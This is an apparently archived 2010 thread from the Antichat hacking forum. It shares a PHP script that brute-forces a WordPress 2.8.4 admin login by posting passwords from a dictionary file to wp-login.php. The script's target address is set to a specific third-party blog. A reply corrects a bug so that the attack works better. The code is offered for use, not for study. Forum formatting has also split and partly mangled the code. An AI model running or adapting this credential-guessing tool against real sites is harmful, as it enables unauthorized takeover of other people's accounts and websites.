Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Брут WordPress 2.8.4 (https://forum.antichat.xyz/showthread.php?t=168679)

Xmas_Maniac 06.01.2010 13:46

Брут WordPress 2.8.4
 
PHP код:

<?php 
/* 
WordPress brute 
Tested on WordPress 2.8.4 russian 
================================== 
visit http://wordpress.org/ 
*/ 
/* Console PHP version */ 
    
$blogaddr="http://blog.aplus.by/"
    
$login="admin"
    
$dict="dict.txt"

    
$pwds=file($dict); 
    
$fg=fopen("good.txt","w"); 
     
    foreach (
$pwds as $pass
    { 
        
$post="log=".$login."&pwd=".$pass."&wp-submit=Login&redirect_to=".$blogaddr."wp-admin/&testcookie=1"
        
$ch=curl_init($blogaddr."wp-login.php"); 
        
CURL_SETOPT($chCURLOPT_POST1); 
        
CURL_SETOPT($chCURLOPT_POSTFIELDS$post); 
        
CURL_SETOPT($chCURLOPT_COOKIEFILE"cookie.txt"); 
        
CURL_SETOPT($chCURLOPT_COOKIEJAR"cookie.txt"); 
        
CURL_SETOPT($chCURLOPT_HEADER0); 
        
CURL_SETOPT($chCURLOPT_URL$blogaddr."wp-login.php"); 
        
CURL_SETOPT($chCURLOPT_RETURNTRANSFER1); 
        
CURL_SETOPT($chCURLOPT_FOLLOWLOCATIONtrue); 
        
$result=curl_exec($ch); 
        
curl_close($ch); 
        if (
strstr($result,"wpOnload")) { 
        
fwrite($fg,"good: $login : $pass"); exit; } 
    } 
    
fclose($fg); 
/*  */ 
?>

$blogaddr – Переменная, в которой хранится адрес блога.
$login – Логин.
$dict – Имя файла словаря.

b3 06.01.2010 15:18

Пароли берутся из файла и не обрабатываются функцией trim(), исправь
PHP код:

$pwds file($dict);
$pwds array_map('trim'$pwds); 



Время: 05:59